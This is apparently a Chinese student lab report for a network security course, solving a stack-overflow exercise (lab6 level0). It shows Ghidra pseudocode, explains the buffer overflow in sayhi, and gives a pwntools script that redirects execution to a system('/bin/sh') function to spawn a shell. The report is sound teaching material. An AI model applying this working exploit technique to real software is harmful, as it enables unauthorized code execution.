OUC-网络安全导论-lab6-stackoverflow
一、实验目标
lab6 包括 5 个题目 (lab6-[1-5]),请分析 5 个题目找到其中的漏洞,写出利用脚本并拿到 shell。
其中 lab6-1/2/3 比较简单,主要考察栈溢出和 shellcode 的简单使用,lab6-4 需要绕过 canary,lab6-5 增加了 一点点点难度。
二、实验内容&实验步骤
level0:
step1:通过Ghidra反汇编,发现 seeme函数已经可以将shell拿到,因此不用写shellcode,只需将sayhi函数的返回地址改成seeme函数的入口地址即可。
void seeme(void)
{
system("/bin/sh");
return;
}
step2:找到seeme的入口
step3 :查看sayhi的函数
int sayhi()
{
char v1; // [esp+0h] [ebp-28h]
puts("Could I know your name?");
myRead((int)&v1, 256);
return printf("Hi, %s.\n", &v1);
}
step4:发现char类型变量,它在栈的ebp-28h的位置,之后是输出一个字符串,然后调用了myRead
函数,查看此函数的伪代码
int myRead(int param_1,int param_2)
{
int local_10;
local_10 = 0;
while( true ) {
if (param_2 <= local_10) {
return local_10;
}
read(0,(void *)(param_1 + local_10),1);
if (*(char *)(param_1 + local_10) == '\n') break;
local_10 = local_10 + 1;
}
*(undefined *)(param_1 + local_10) = 0;
return local_10;
}
step5:可以看出来,它的功能是使用C语言的库函数read读取a2个字符到地址a1中。看到这儿,就已经可以发现程序的漏洞所在了,v1是一个char类型的变量,它只能存储一个字符,但是在调用myRead函数时,却让它读取256个字符,这样极容易发生栈溢出。前面说过,v1在栈上的位置是ebp-28h,而我们输入的字符串的首地址就是v1的地址,那么我们可以输入28h个填充字符覆盖从v1到ebp的空间,再输入4个填充字符覆盖旧的ebp,最后输入seeme函数的入口地址0x080485B3(小端方式)。
step6:python代码
from pwn import *
conn=process('/home/stu39/lab6/level0')
seeme=0x080485B3
conn.recv()
payload = b'a' * (0x28 + 4)+p32(seeme)
conn.sendline(payload)
conn.recv()
conn.interactive()
step7:建立vim文件,并写入python文件
step8:添加执行权限,保存,并运行
chmod +x /home/stu39/lab6/level0
:wq //保存并退出
python3 level0.py //用python运行level0.py